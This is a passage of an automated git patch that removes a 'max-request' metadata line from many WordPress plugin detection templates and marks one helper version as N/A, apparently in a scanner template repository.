workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 0a25f00ed507890049d24944b7ad0c239e151df8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 11 Sep 2023 04:02:11 +0000 Subject: [PATCH 0272/1090] Auto WordPress Plugins Update [Mon Sep 11 04:02:11 UTC 2023] :robot: --- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 201 files changed, 1 insertion(+), 201 deletions(-) diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index c355d6e218..44c2012635 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.10.0 \ No newline at end of file +N/A \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 